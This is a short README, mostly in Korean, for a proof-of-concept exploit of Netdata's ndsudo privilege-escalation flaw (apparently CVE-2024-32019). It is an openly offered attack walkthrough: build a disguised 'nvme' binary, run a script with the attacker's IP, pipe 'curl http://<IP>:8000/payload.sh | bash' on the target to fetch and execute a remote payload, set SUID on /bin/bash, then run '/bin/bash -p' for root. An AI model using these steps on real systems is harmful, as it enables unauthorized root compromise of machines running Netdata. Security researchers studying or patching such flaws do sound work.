
Netdata ndsudo PoC
Netdata ndsudo PoC
바이너리 빌드:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
bash 스크립트 실행:
bash exploit.sh <YOUR IP>
대상 머신에서 쓰기 가능한 디렉토리에서 실행:
curl http://<YOUT IP>:8000/payload.sh | bash
자동으로 nvme 바이너리를 다운로드하고, 경로를 설정하고, ndsudo를 실행한 후 /bin/bash에 SUID를 추가합니다.
아마도 exploit.sh에서 ndsudo 경로를 변경해야 할 수 있습니다.
권한 상승을 위해 다음을 실행:
/bin/bash -p
이 익스플로잇은 https://github.com/AzureADTrent/CVE-2024-32019-POC 를 기반으로 합니다. 테스트 중 다음과 같은 오류가 발생했습니다:
execve: Exec format error
그래서 Go로 직접 만들기로 결정했습니다.